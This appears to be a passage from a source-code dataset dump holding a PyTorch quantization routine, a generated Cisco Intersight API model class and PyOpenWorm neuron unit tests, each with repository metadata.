        # Scaling factors arrive either already 3-D or as a flat vector that
        # must be broadcast over (batch, seq, features).
        if len(pre_act_scaling_factor.shape) == 3:
            reshape = lambda x: x  # noqa: E731 — kept as in the 3-D branch below
        else:
            reshape = lambda x: x.view(1, 1, -1)  # noqa: E731
        ctx.identity = identity
        n = 2 ** (bit_num - 1) - 1  # max representable magnitude
        with torch.no_grad():
            pre_act_scaling_factor = reshape(pre_act_scaling_factor)
            if identity is not None:
                identity_scaling_factor = reshape(identity_scaling_factor)
            ctx.z_scaling_factor = z_scaling_factor
            # Integer representation of the input at its own scale.
            z_int = torch.round(pre_act / pre_act_scaling_factor)
            # Ratio of scales in double precision to limit rounding error.
            _A = pre_act_scaling_factor.type(torch.double)
            _B = (z_scaling_factor.type(torch.float)).type(torch.double)
            new_scale = _A / _B
            new_scale = reshape(new_scale)
            # Express the ratio as (integer mantissa m) / 2**e.
            m, e = batch_frexp(new_scale)
            output = z_int.type(torch.double) * m.type(torch.double)
            output = torch.round(output / (2.0**e))
            if identity is not None:
                # Same integer multiply-and-shift for the residual branch.
                wx_int = torch.round(identity / identity_scaling_factor)
                _A = identity_scaling_factor.type(torch.double)
                _B = (z_scaling_factor.type(torch.float)).type(torch.double)
                new_scale = _A / _B
                new_scale = reshape(new_scale)
                m1, e1 = batch_frexp(new_scale)
                output1 = wx_int.type(torch.double) * m1.type(torch.double)
                output1 = torch.round(output1 / (2.0**e1))
                output = output1 + output
            return torch.clamp(output.type(torch.float), -n - 1, n)
    @staticmethod
    def backward(ctx, grad_output):
        """Straight-through gradient for `pre_act` (and `identity` if given)."""
        identity_grad = None
        if ctx.identity is not None:
            identity_grad = grad_output.clone() / ctx.z_scaling_factor
        # One gradient slot per forward argument; non-tensor args get None.
        return (
            grad_output.clone() / ctx.z_scaling_factor,
            None,
            None,
            None,
            None,
            identity_grad,
            None,
        )
| true | true |
f71918cfc24775f026b1e9e604deca5c1ed4179d | 18,802 | py | Python | intersight/model/fabric_transceiver_role.py | CiscoDevNet/intersight-python | 04b721f37c3044646a91c185c7259edfb991557a | [
"Apache-2.0"
] | 5 | 2021-12-16T15:13:32.000Z | 2022-03-29T16:09:54.000Z | intersight/model/fabric_transceiver_role.py | CiscoDevNet/intersight-python | 04b721f37c3044646a91c185c7259edfb991557a | [
"Apache-2.0"
] | 4 | 2022-01-25T19:05:51.000Z | 2022-03-29T20:18:37.000Z | intersight/model/fabric_transceiver_role.py | CiscoDevNet/intersight-python | 04b721f37c3044646a91c185c7259edfb991557a | [
"Apache-2.0"
] | 2 | 2020-07-07T15:01:08.000Z | 2022-01-31T04:27:35.000Z | """
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
    """Import related model classes on demand and publish them in globals().

    Deferred (rather than module-level) imports avoid circular-import issues
    among the generated Intersight model modules.
    """
    from intersight.model.display_names import DisplayNames
    from intersight.model.fabric_appliance_role import FabricApplianceRole
    from intersight.model.fabric_fcoe_uplink_role import FabricFcoeUplinkRole
    from intersight.model.fabric_port_policy_relationship import FabricPortPolicyRelationship
    from intersight.model.fabric_port_role import FabricPortRole
    from intersight.model.fabric_transceiver_role_all_of import FabricTransceiverRoleAllOf
    from intersight.model.fabric_uplink_role import FabricUplinkRole
    from intersight.model.mo_base_mo_relationship import MoBaseMoRelationship
    from intersight.model.mo_tag import MoTag
    from intersight.model.mo_version_context import MoVersionContext
    globals()['DisplayNames'] = DisplayNames
    globals()['FabricApplianceRole'] = FabricApplianceRole
    globals()['FabricFcoeUplinkRole'] = FabricFcoeUplinkRole
    globals()['FabricPortPolicyRelationship'] = FabricPortPolicyRelationship
    globals()['FabricPortRole'] = FabricPortRole
    globals()['FabricTransceiverRoleAllOf'] = FabricTransceiverRoleAllOf
    globals()['FabricUplinkRole'] = FabricUplinkRole
    globals()['MoBaseMoRelationship'] = MoBaseMoRelationship
    globals()['MoTag'] = MoTag
    globals()['MoVersionContext'] = MoVersionContext
class FabricTransceiverRole(ModelComposed):
    """Auto-generated OpenAPI model for a fabric transceiver port role.

    NOTE: generated by OpenAPI Generator (https://openapi-generator.tech);
    do not edit manually. Composed (allOf) of FabricPortRole and
    FabricTransceiverRoleAllOf; 'class_id' acts as the discriminator.

    Attributes:
        allowed_values (dict): maps an attribute-path tuple to the dict of
            allowed enum values for that attribute.
        attribute_map (dict): maps the python attribute name to the JSON key.
        validations (dict): maps an attribute-path tuple to its numeric
            validation constraints (inclusive min/max).
        additional_properties_type (tuple): classes accepted as values for
            additional (undeclared) properties.
    """

    allowed_values = {
        ('class_id',): {
            'APPLIANCEROLE': "fabric.ApplianceRole",
            'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
            'UPLINKROLE': "fabric.UplinkRole",
        },
        ('object_type',): {
            'APPLIANCEROLE': "fabric.ApplianceRole",
            'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
            'UPLINKROLE': "fabric.UplinkRole",
        },
        ('admin_speed',): {
            'AUTO': "Auto",
            '1GBPS': "1Gbps",
            '10GBPS': "10Gbps",
            '25GBPS': "25Gbps",
            '40GBPS': "40Gbps",
            '100GBPS': "100Gbps",
        },
        ('fec',): {
            'AUTO': "Auto",
            'CL91': "Cl91",
            'CL74': "Cl74",
        },
    }

    validations = {
        ('aggregate_port_id',): {
            'inclusive_maximum': 108,
            'inclusive_minimum': 0,
        },
        ('port_id',): {
            'inclusive_maximum': 108,
            'inclusive_minimum': 1,
        },
        ('slot_id',): {
            'inclusive_maximum': 5,
            'inclusive_minimum': 1,
        },
    }

    @cached_property
    def additional_properties_type():
        """Types accepted for additional properties.

        A method (not a class attribute) because a model may have properties
        of its own type; it must run after the class is loaded.
        """
        lazy_import()
        return (bool, date, datetime, dict, float, int, list, str, none_type,)  # noqa: E501

    _nullable = False

    @cached_property
    def openapi_types():
        """Map attribute name -> accepted type tuple.

        A method (not a class attribute) because a model may have properties
        of its own type; it must run after the class is loaded.
        """
        lazy_import()
        return {
            'class_id': (str,),  # noqa: E501
            'object_type': (str,),  # noqa: E501
            'admin_speed': (str,),  # noqa: E501
            'fec': (str,),  # noqa: E501
            'account_moid': (str,),  # noqa: E501
            'create_time': (datetime,),  # noqa: E501
            'domain_group_moid': (str,),  # noqa: E501
            'mod_time': (datetime,),  # noqa: E501
            'moid': (str,),  # noqa: E501
            'owners': ([str], none_type,),  # noqa: E501
            'shared_scope': (str,),  # noqa: E501
            'tags': ([MoTag], none_type,),  # noqa: E501
            'version_context': (MoVersionContext,),  # noqa: E501
            'ancestors': ([MoBaseMoRelationship], none_type,),  # noqa: E501
            'parent': (MoBaseMoRelationship,),  # noqa: E501
            'permission_resources': ([MoBaseMoRelationship], none_type,),  # noqa: E501
            'display_names': (DisplayNames,),  # noqa: E501
            'aggregate_port_id': (int,),  # noqa: E501
            'port_id': (int,),  # noqa: E501
            'slot_id': (int,),  # noqa: E501
            'port_policy': (FabricPortPolicyRelationship,),  # noqa: E501
        }

    @cached_property
    def discriminator():
        """Map discriminator values ('class_id') to concrete model classes."""
        lazy_import()
        val = {
            'fabric.ApplianceRole': FabricApplianceRole,
            'fabric.FcoeUplinkRole': FabricFcoeUplinkRole,
            'fabric.UplinkRole': FabricUplinkRole,
        }
        if not val:
            return None
        return {'class_id': val}

    # Python attribute name -> serialized (JSON) key.
    attribute_map = {
        'class_id': 'ClassId',  # noqa: E501
        'object_type': 'ObjectType',  # noqa: E501
        'admin_speed': 'AdminSpeed',  # noqa: E501
        'fec': 'Fec',  # noqa: E501
        'account_moid': 'AccountMoid',  # noqa: E501
        'create_time': 'CreateTime',  # noqa: E501
        'domain_group_moid': 'DomainGroupMoid',  # noqa: E501
        'mod_time': 'ModTime',  # noqa: E501
        'moid': 'Moid',  # noqa: E501
        'owners': 'Owners',  # noqa: E501
        'shared_scope': 'SharedScope',  # noqa: E501
        'tags': 'Tags',  # noqa: E501
        'version_context': 'VersionContext',  # noqa: E501
        'ancestors': 'Ancestors',  # noqa: E501
        'parent': 'Parent',  # noqa: E501
        'permission_resources': 'PermissionResources',  # noqa: E501
        'display_names': 'DisplayNames',  # noqa: E501
        'aggregate_port_id': 'AggregatePortId',  # noqa: E501
        'port_id': 'PortId',  # noqa: E501
        'slot_id': 'SlotId',  # noqa: E501
        'port_policy': 'PortPolicy',  # noqa: E501
    }

    # Internal bookkeeping attributes that are never serialized.
    required_properties = set([
        '_data_store',
        '_check_type',
        '_spec_property_naming',
        '_path_to_item',
        '_configuration',
        '_visited_composed_classes',
        '_composed_instances',
        '_var_name_to_model_instances',
        '_additional_properties_model_instances',
    ])

    @convert_js_args_to_python_args
    def __init__(self, class_id, object_type, *args, **kwargs):  # noqa: E501
        """FabricTransceiverRole - a model defined in OpenAPI.

        Args:
            class_id (str): Fully-qualified name of the concrete type; used
                as the discriminator when (un)marshaling (see allowed_values).
            object_type (str): Fully-qualified concrete type name; should
                match 'class_id'.

        Keyword Args:
            _check_type (bool): type-check inputs if True (default True).
            _path_to_item (tuple/list): location of this model within the
                received data, used for error reporting.
            _spec_property_naming (bool): True if input keys use the
                serialized (OpenAPI) names rather than pythonic names.
            _configuration (Configuration): instance used when deserializing
                file_type parameters; if omitted no conversion is done.
            _visited_composed_classes (tuple): composed classes already
                traversed, so a discriminator is not applied twice.
            admin_speed (str): admin configured port speed; one of
                "Auto" (default), "1Gbps", "10Gbps", "25Gbps", "40Gbps",
                "100Gbps". [optional]
            fec (str): forward error correction; "Auto" (default), "Cl91"
                or "Cl74". [optional]
            account_moid (str): Account ID of this MO. [optional]
            create_time (datetime): creation time of this MO. [optional]
            domain_group_moid (str): DomainGroup ID of this MO. [optional]
            mod_time (datetime): last modification time. [optional]
            moid (str): unique identifier of this MO instance. [optional]
            owners ([str], none_type): [optional]
            shared_scope (str): sharing scope (global or license tier) of a
                catalog-provided MO. [optional]
            tags ([MoTag], none_type): [optional]
            version_context (MoVersionContext): [optional]
            ancestors ([MoBaseMoRelationship], none_type): relationships to
                moBaseMo resources. [optional]
            parent (MoBaseMoRelationship): [optional]
            permission_resources ([MoBaseMoRelationship], none_type):
                relationships to moBaseMo resources. [optional]
            display_names (DisplayNames): [optional]
            aggregate_port_id (int): breakout port id; 0 (unused) when the
                port is not configured as breakout. [optional]
            port_id (int): port id on the switch/FEX/chassis; for breakout
                ports, the id on the fanout side of the cable. [optional]
            slot_id (int): slot id of the switch/FEX/chassis interface.
                [optional]
            port_policy (FabricPortPolicyRelationship): [optional]
        """

        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())

        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )

        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)

        constant_args = {
            '_check_type': _check_type,
            '_path_to_item': _path_to_item,
            '_spec_property_naming': _spec_property_naming,
            '_configuration': _configuration,
            '_visited_composed_classes': self._visited_composed_classes,
        }
        required_args = {
            'class_id': class_id,
            'object_type': object_type,
        }
        model_args = {}
        model_args.update(required_args)
        model_args.update(kwargs)
        # Distribute the arguments across the composed (allOf) schemas.
        composed_info = validate_get_composed_info(
            constant_args, model_args, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        unused_args = composed_info[3]

        for var_name, var_value in required_args.items():
            setattr(self, var_name, var_value)
        for var_name, var_value in kwargs.items():
            if var_name in unused_args and \
                        self._configuration is not None and \
                        self._configuration.discard_unknown_keys and \
                        not self._additional_properties_model_instances:
                # discard variable.
                continue
            setattr(self, var_name, var_value)

    @cached_property
    def _composed_schemas():
        # we need this here to make our import statements work
        # we must store _composed_schemas in here so the code is only run
        # when we invoke this method. If we kept this at the class
        # level we would get an error beause the class level
        # code would be run when this module is imported, and these composed
        # classes don't exist yet because their module has not finished
        # loading
        lazy_import()
        return {
          'anyOf': [
          ],
          'allOf': [
              FabricPortRole,
              FabricTransceiverRoleAllOf,
          ],
          'oneOf': [
          ],
        }
| 54.184438 | 1,678 | 0.636794 |
import re
import sys
from intersight.model_utils import (
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
    """Import related model classes on demand and publish them in globals().

    Deferred (rather than module-level) imports avoid circular-import issues
    among the generated Intersight model modules.
    """
    from intersight.model.display_names import DisplayNames
    from intersight.model.fabric_appliance_role import FabricApplianceRole
    from intersight.model.fabric_fcoe_uplink_role import FabricFcoeUplinkRole
    from intersight.model.fabric_port_policy_relationship import FabricPortPolicyRelationship
    from intersight.model.fabric_port_role import FabricPortRole
    from intersight.model.fabric_transceiver_role_all_of import FabricTransceiverRoleAllOf
    from intersight.model.fabric_uplink_role import FabricUplinkRole
    from intersight.model.mo_base_mo_relationship import MoBaseMoRelationship
    from intersight.model.mo_tag import MoTag
    from intersight.model.mo_version_context import MoVersionContext
    globals()['DisplayNames'] = DisplayNames
    globals()['FabricApplianceRole'] = FabricApplianceRole
    globals()['FabricFcoeUplinkRole'] = FabricFcoeUplinkRole
    globals()['FabricPortPolicyRelationship'] = FabricPortPolicyRelationship
    globals()['FabricPortRole'] = FabricPortRole
    globals()['FabricTransceiverRoleAllOf'] = FabricTransceiverRoleAllOf
    globals()['FabricUplinkRole'] = FabricUplinkRole
    globals()['MoBaseMoRelationship'] = MoBaseMoRelationship
    globals()['MoTag'] = MoTag
    globals()['MoVersionContext'] = MoVersionContext
class FabricTransceiverRole(ModelComposed):
    """Auto-generated OpenAPI model for a fabric transceiver port role.

    NOTE: generated by OpenAPI Generator; do not edit manually. Composed
    (allOf) of FabricPortRole and FabricTransceiverRoleAllOf; 'class_id'
    acts as the discriminator.
    """

    # Attribute-path tuple -> allowed enum values.
    allowed_values = {
        ('class_id',): {
            'APPLIANCEROLE': "fabric.ApplianceRole",
            'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
            'UPLINKROLE': "fabric.UplinkRole",
        },
        ('object_type',): {
            'APPLIANCEROLE': "fabric.ApplianceRole",
            'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
            'UPLINKROLE': "fabric.UplinkRole",
        },
        ('admin_speed',): {
            'AUTO': "Auto",
            '1GBPS': "1Gbps",
            '10GBPS': "10Gbps",
            '25GBPS': "25Gbps",
            '40GBPS': "40Gbps",
            '100GBPS': "100Gbps",
        },
        ('fec',): {
            'AUTO': "Auto",
            'CL91': "Cl91",
            'CL74': "Cl74",
        },
    }

    # Attribute-path tuple -> numeric validation constraints.
    validations = {
        ('aggregate_port_id',): {
            'inclusive_maximum': 108,
            'inclusive_minimum': 0,
        },
        ('port_id',): {
            'inclusive_maximum': 108,
            'inclusive_minimum': 1,
        },
        ('slot_id',): {
            'inclusive_maximum': 5,
            'inclusive_minimum': 1,
        },
    }

    @cached_property
    def additional_properties_type():
        """Types accepted for additional (undeclared) properties."""
        lazy_import()
        return (bool, date, datetime, dict, float, int, list, str, none_type,)

    _nullable = False

    @cached_property
    def openapi_types():
        """Map attribute name -> accepted type tuple (lazy to avoid cycles)."""
        lazy_import()
        return {
            'class_id': (str,),
            'object_type': (str,),
            'admin_speed': (str,),
            'fec': (str,),
            'account_moid': (str,),
            'create_time': (datetime,),
            'domain_group_moid': (str,),
            'mod_time': (datetime,),
            'moid': (str,),
            'owners': ([str], none_type,),
            'shared_scope': (str,),
            'tags': ([MoTag], none_type,),
            'version_context': (MoVersionContext,),
            'ancestors': ([MoBaseMoRelationship], none_type,),
            'parent': (MoBaseMoRelationship,),
            'permission_resources': ([MoBaseMoRelationship], none_type,),
            'display_names': (DisplayNames,),
            'aggregate_port_id': (int,),
            'port_id': (int,),
            'slot_id': (int,),
            'port_policy': (FabricPortPolicyRelationship,),
        }

    @cached_property
    def discriminator():
        """Map discriminator values ('class_id') to concrete model classes."""
        lazy_import()
        val = {
            'fabric.ApplianceRole': FabricApplianceRole,
            'fabric.FcoeUplinkRole': FabricFcoeUplinkRole,
            'fabric.UplinkRole': FabricUplinkRole,
        }
        if not val:
            return None
        return {'class_id': val}

    # Python attribute name -> serialized (JSON) key.
    attribute_map = {
        'class_id': 'ClassId',
        'object_type': 'ObjectType',
        'admin_speed': 'AdminSpeed',
        'fec': 'Fec',
        'account_moid': 'AccountMoid',
        'create_time': 'CreateTime',
        'domain_group_moid': 'DomainGroupMoid',
        'mod_time': 'ModTime',
        'moid': 'Moid',
        'owners': 'Owners',
        'shared_scope': 'SharedScope',
        'tags': 'Tags',
        'version_context': 'VersionContext',
        'ancestors': 'Ancestors',
        'parent': 'Parent',
        'permission_resources': 'PermissionResources',
        'display_names': 'DisplayNames',
        'aggregate_port_id': 'AggregatePortId',
        'port_id': 'PortId',
        'slot_id': 'SlotId',
        'port_policy': 'PortPolicy',
    }

    # Internal bookkeeping attributes that are never serialized.
    required_properties = set([
        '_data_store',
        '_check_type',
        '_spec_property_naming',
        '_path_to_item',
        '_configuration',
        '_visited_composed_classes',
        '_composed_instances',
        '_var_name_to_model_instances',
        '_additional_properties_model_instances',
    ])

    @convert_js_args_to_python_args
    def __init__(self, class_id, object_type, *args, **kwargs):
        """Build the composed model; see allowed_values for the enums.

        Args:
            class_id (str): concrete-type discriminator.
            object_type (str): fully-qualified concrete type name; should
                match 'class_id'.
        """
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        constant_args = {
            '_check_type': _check_type,
            '_path_to_item': _path_to_item,
            '_spec_property_naming': _spec_property_naming,
            '_configuration': _configuration,
            '_visited_composed_classes': self._visited_composed_classes,
        }
        required_args = {
            'class_id': class_id,
            'object_type': object_type,
        }
        model_args = {}
        model_args.update(required_args)
        model_args.update(kwargs)
        # Distribute the arguments across the composed (allOf) schemas.
        composed_info = validate_get_composed_info(
            constant_args, model_args, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        unused_args = composed_info[3]
        for var_name, var_value in required_args.items():
            setattr(self, var_name, var_value)
        for var_name, var_value in kwargs.items():
            if var_name in unused_args and \
                        self._configuration is not None and \
                        self._configuration.discard_unknown_keys and \
                        not self._additional_properties_model_instances:
                # Discard unknown keys when the configuration requests it.
                continue
            setattr(self, var_name, var_value)

    @cached_property
    def _composed_schemas():
        # Computed lazily: the composed classes' modules may not have
        # finished loading when this module is imported.
        lazy_import()
        return {
          'anyOf': [
          ],
          'allOf': [
              FabricPortRole,
              FabricTransceiverRoleAllOf,
          ],
          'oneOf': [
          ],
        }
| true | true |
f7191914c7488e7767557e9c0a804a86c906515e | 4,350 | py | Python | tests/NeuronTest.py | jaideep-seth/PyOpenWorm | c36baeda9590334ba810296934973da34f0eab78 | [
"MIT"
] | 1 | 2019-03-22T12:02:36.000Z | 2019-03-22T12:02:36.000Z | tests/NeuronTest.py | BioComSoftware/PyOpenWorm | 32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f | [
"MIT"
] | null | null | null | tests/NeuronTest.py | BioComSoftware/PyOpenWorm | 32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f | [
"MIT"
] | null | null | null | from __future__ import print_function
from __future__ import absolute_import
from .DataTestTemplate import _DataTest
from PyOpenWorm.neuron import Neuron
from PyOpenWorm.cell import Cell
from PyOpenWorm.connection import Connection
from PyOpenWorm.context import Context
class NeuronTest(_DataTest):
    """Unit tests for PyOpenWorm's Neuron model (identity, receptors,
    neighbors and synaptic connections, including context staging)."""

    # Classes whose statements are staged into the test context.
    ctx_classes = (Neuron, Connection)

    def setUp(self):
        _DataTest.setUp(self)
        # Shorthand factory: a context-bound Neuron by name.
        self.neur = lambda x: self.ctx.Neuron(name=x)

    def test_Cell(self):
        """A Neuron is a Cell."""
        do = self.neur('BDUL')
        self.assertTrue(isinstance(do, Cell))

    def test_receptors(self):
        """A saved receptor is retrievable from a fresh query object."""
        n = self.neur('AVAL')
        n.receptor('GLR-2')
        self.save()
        self.assertIn('GLR-2', list(self.neur('AVAL').receptors()))

    def test_same_name_same_id(self):
        """
        Test that two Neuron objects with the same name have the same
        identifier. Saves us from having too many inserts of the same object.
        """
        c = Neuron(name="boots")
        c1 = Neuron(name="boots")
        self.assertEqual(c.identifier, c1.identifier)

    def test_type(self):
        """A saved neuron type is retrievable from a fresh query object."""
        n = self.neur('AVAL')
        n.type('interneuron')
        self.save()
        self.assertEqual('interneuron', self.neur('AVAL').type.one())

    def test_name(self):
        """
        Test that the name property is set when the neuron is initialized
        with it
        """
        self.assertEqual('AVAL', self.neur('AVAL').name())
        self.assertEqual('AVAR', self.neur('AVAR').name())

    def test_neighbor(self):
        """A staged neighbor is visible both before and after saving."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        neighbors = list(n.neighbor())
        self.assertIn(self.neur('PVCL'), neighbors)
        self.save()
        self.assertIn(self.neur('PVCL'), list(self.neur('AVAL').neighbor()))

    def test_neighbor_count(self):
        """count() on a query variable matches the one saved neighbor."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        self.save()
        p = self.ctx.Neuron()
        self.neur('AVAL').neighbor(p)
        self.assertEqual(1, p.count())

    def test_neighbor_count_staged(self):
        """neighbor.count() sees a staged (unsaved) statement."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        self.assertEqual(1, n.neighbor.count())

    def test_neighbor_count_context_staged(self):
        """A different context does not see statements staged elsewhere."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        ctx1 = Context(ident='http://example.org/ctx1')
        self.assertEqual(0, ctx1(n).neighbor.count())

    def test_connection_count(self):
        """connection.count() matches the one saved connection."""
        n = self.neur('AVAL')
        n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
        self.save()
        self.assertEqual(1, self.neur('AVAL').connection.count())

    def test_connection_count_staged(self):
        """connection.count() sees a staged (unsaved) connection."""
        n = self.neur('AVAL')
        n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
        self.assertEqual(1, n.connection.count())

    def test_neighbor_context(self):
        """Querying via another context yields no staged neighbors."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n1 = self.ctx.Neuron(name='NEURON1')
        ctx1 = Context(ident='http://example.org/ctx1')
        n0.neighbor(n1)
        self.assertEqual(set(), set(ctx1(n0).neighbor()))

    def test_connection_get_staged(self):
        """A fully-defined staged connection is returned by connection()."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n1 = self.ctx.Neuron(name='NEURON1')
        n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
        self.assertEqual(1, len(n0.connection()))

    def test_connection_only_defined(self):
        """An empty (undefined) Connection is not returned by connection()."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n0.connection(self.ctx.Connection())
        self.assertEqual(0, len(n0.connection()))

    def test_connection_context(self):
        """Querying via another context yields no staged connections."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n1 = self.ctx.Neuron(name='NEURON1')
        ctx1 = Context(ident='http://example.org/ctx1')
        n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
        self.assertEqual(set(), set(ctx1(n0).connection()))

    def test_init_from_lineage_name(self):
        """A neuron saved with a lineage name can be looked up by it."""
        c = self.ctx.Neuron(lineageName="AB plapaaaap", name="ADAL")
        self.save()
        # Debug output: dump the stored RDF quads before querying.
        for x in self.TestConfig['rdf.graph'].quads((None, None, None, None)):
            print(' '.join(y.n3() for y in x))
        c = self.context.stored(Neuron)(lineageName="AB plapaaaap")
        print(c.context)
        self.assertEqual(c.name(), 'ADAL')
| 35.365854 | 85 | 0.624828 | from __future__ import print_function
from __future__ import absolute_import
from .DataTestTemplate import _DataTest
from PyOpenWorm.neuron import Neuron
from PyOpenWorm.cell import Cell
from PyOpenWorm.connection import Connection
from PyOpenWorm.context import Context
class NeuronTest(_DataTest):
ctx_classes = (Neuron, Connection)
def setUp(self):
_DataTest.setUp(self)
self.neur = lambda x: self.ctx.Neuron(name=x)
def test_Cell(self):
do = self.neur('BDUL')
self.assertTrue(isinstance(do, Cell))
def test_receptors(self):
n = self.neur('AVAL')
n.receptor('GLR-2')
self.save()
self.assertIn('GLR-2', list(self.neur('AVAL').receptors()))
def test_same_name_same_id(self):
c = Neuron(name="boots")
c1 = Neuron(name="boots")
self.assertEqual(c.identifier, c1.identifier)
def test_type(self):
n = self.neur('AVAL')
n.type('interneuron')
self.save()
self.assertEqual('interneuron', self.neur('AVAL').type.one())
def test_name(self):
self.assertEqual('AVAL', self.neur('AVAL').name())
self.assertEqual('AVAR', self.neur('AVAR').name())
def test_neighbor(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
neighbors = list(n.neighbor())
self.assertIn(self.neur('PVCL'), neighbors)
self.save()
self.assertIn(self.neur('PVCL'), list(self.neur('AVAL').neighbor()))
def test_neighbor_count(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.save()
p = self.ctx.Neuron()
self.neur('AVAL').neighbor(p)
self.assertEqual(1, p.count())
def test_neighbor_count_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.assertEqual(1, n.neighbor.count())
def test_neighbor_count_context_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
ctx1 = Context(ident='http://example.org/ctx1')
self.assertEqual(0, ctx1(n).neighbor.count())
def test_connection_count(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.save()
self.assertEqual(1, self.neur('AVAL').connection.count())
def test_connection_count_staged(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.assertEqual(1, n.connection.count())
def test_neighbor_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.neighbor(n1)
self.assertEqual(set(), set(ctx1(n0).neighbor()))
def test_connection_get_staged(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(1, len(n0.connection()))
def test_connection_only_defined(self):
n0 = self.ctx.Neuron(name='NEURON0')
n0.connection(self.ctx.Connection())
self.assertEqual(0, len(n0.connection()))
def test_connection_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(set(), set(ctx1(n0).connection()))
def test_init_from_lineage_name(self):
c = self.ctx.Neuron(lineageName="AB plapaaaap", name="ADAL")
self.save()
for x in self.TestConfig['rdf.graph'].quads((None, None, None, None)):
print(' '.join(y.n3() for y in x))
c = self.context.stored(Neuron)(lineageName="AB plapaaaap")
print(c.context)
self.assertEqual(c.name(), 'ADAL')
| true | true |
f719199aa68ef685b796249b0f94249df6e5c02f | 105 | py | Python | tests/parser/query.10.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/query.10.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
